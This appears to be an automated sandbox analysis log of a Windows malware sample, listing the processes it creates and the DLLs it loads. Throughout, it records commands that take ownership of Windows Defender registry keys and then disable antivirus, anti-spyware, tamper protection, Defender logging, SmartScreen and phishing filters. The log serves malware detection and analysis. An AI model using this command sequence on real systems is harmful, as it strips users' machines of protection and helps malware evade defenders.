Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
